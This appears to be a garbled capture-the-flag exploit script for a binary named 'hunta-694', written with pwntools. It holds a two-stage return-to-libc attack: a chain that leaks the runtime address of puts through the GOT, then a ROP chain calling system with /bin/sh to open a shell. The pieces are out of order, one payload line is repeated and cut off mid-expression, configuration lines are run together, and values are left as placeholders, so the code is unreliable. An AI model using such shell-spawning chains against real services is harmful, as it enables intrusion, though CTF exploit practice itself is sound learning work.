Hunta-694 [patched] -

# Stage 1: leak the runtime address of puts via puts@got.
# NOTE(review): `offset`, `puts_plt`, `main_addr`, `puts_got` and `io` are
# defined elsewhere in the script; `flat` comes from pwntools.
leak_chain = [
    b'A' * offset,  # padding of `offset` bytes
    puts_plt,       # call puts
    main_addr,      # return to main after the leak
    puts_got,       # argument to puts -> leak real puts address
]
leak_payload = flat(*leak_chain)
io.sendlineafter(b'> ', leak_payload)

Run it with `./exploit.py | tee flag.txt`, or, within the interactive session:

CTF<something_related_to_the_challenge> Capture it with: hunta-694

# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY)

# ---- Get the flag ------------------------------------------------- io.interactive() # should drop you into a shell; cat flag.txt leak_payload = flat( b'A' * offset, puts_plt, #

# Stage 2: send the final ROP chain once libc addresses are known.
# NOTE(review): `offset`, `pop_rdi`, `bin_sh`, `system` and `io` are computed
# elsewhere in the script (presumably from the Stage 1 leak — confirm).
rop_chain = [
    b'A' * offset,  # padding, same `offset` as the leak stage
    pop_rdi,        # pop rdi gadget
    bin_sh,         # first argument
    system,         # call target
]
rop_payload = flat(*rop_chain)
io.sendlineafter(b'> ', rop_payload)

context.binary = ELF context.terminal = ['tmux', 'splitw', '-h'] leak_payload = flat( b'A' * offset

# ----------------------------------------------------------------------
# Helper functions
# ----------------------------------------------------------------------
def start():
    """Open the target: remote(HOST, PORT) when both are set, else a local process(BINARY).

    HOST, PORT and BINARY are module-level configuration values;
    `remote` and `process` are the pwntools tube constructors.
    """
    use_remote = bool(HOST and PORT)
    if not use_remote:
        return process(BINARY)
    return remote(HOST, PORT)